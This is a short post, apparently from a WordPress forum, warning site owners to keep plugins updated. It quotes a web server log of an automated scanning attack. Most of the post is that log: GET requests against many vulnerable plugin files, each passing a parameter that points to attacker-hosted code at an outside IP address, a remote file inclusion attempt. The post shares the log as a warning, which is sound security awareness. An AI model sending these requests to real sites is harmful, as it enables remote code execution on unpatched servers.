Reasons to keep your wp site up to date

Hi!

Just found this little scrip kiddie this morning on one of my sites:

94.199.51.7 - - [23/Apr/2013:05:03:50 -0700] “GET /wp-content/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:50 -0700] “GET /wp-includes/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 403 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:52 -0700] “GET /wp-content/plugins/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:52 -0700] “GET /wp-content/includes/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:54 -0700] “GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:55 -0700] “GET /wp-includes/functions.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 572 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:55 -0700] “GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:56 -0700] “GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:58 -0700] “GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:59 -0700] “GET /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:00 -0700] “GET /wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:01 -0700] “GET /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:03 -0700] “GET /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:04 -0700] “GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:05 -0700] “GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:06 -0700] “GET /wp-content/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:07 -0700] “GET /wp-content/plugins/livesig/livesig-ajax-backend.php?$_POST[‘wp-root’]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:09 -0700] “GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:09 -0700] “GET /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/enable-latex/core.php?url=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-includes/js/tinymce/plugins/spellchecker/includes/general.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/wpeasystats/export.php?homep=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/spellchecker/includes/general.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/wpeasystats/export.php?homep=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:12 -0700] “GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:12 -0700] “GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/mailz/lists/config/config.php?wpabspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-includes/functions.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 572 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?_POST[“abspath”]=http://94.199.51.7/readme.txt? HTTP/1.1” 503 532 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” “Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0”

It’s an inventory of broken plugins, if your wesbite is up to date, this won’t affect you, but if you’ve fallen asleep with your updates…

Yummy exploits delivered directly to your Admin Panel courtesy of wordpress.org

The default install tagline should be “Just another soon-to-be-exploited WordPress site”

I’ve been using http://wordpress.org/extend/plugins/automatic-updater/ to keep my plugins and themes up to date. Works like a champ :slight_smile: